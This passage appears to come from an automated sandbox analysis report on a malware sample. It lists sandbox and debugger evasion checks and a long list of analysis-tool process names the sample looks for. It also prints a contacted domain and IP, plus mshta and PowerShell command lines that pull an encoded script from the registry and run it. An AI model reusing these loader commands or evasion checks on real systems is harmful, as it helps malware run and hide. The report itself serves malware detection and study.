Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: DEBUG: FS_CM - TRUESBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXEP
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE(
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXEP
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE(
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.716103963.000001C48F7B1000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1992 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6643 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2678 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05741577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 18_2_05741577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057314A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 18_2_057314A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05746E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 18_2_05746E4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05751802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 18_2_05751802
Source: rundll32.exe, 00000012.00000003.797288272.0000000000B78000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05745529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 18_2_05745529
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05752A09 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 18_2_05752A09

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80 Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.0.cs Jump to dropped file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP' Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F26CD6 cpuid 18_2_00F26CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574E3F3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 18_2_0574E3F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F266CE GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 18_2_00F266CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F25A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 18_2_00F25A5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F26CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 18_2_00F26CD6

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
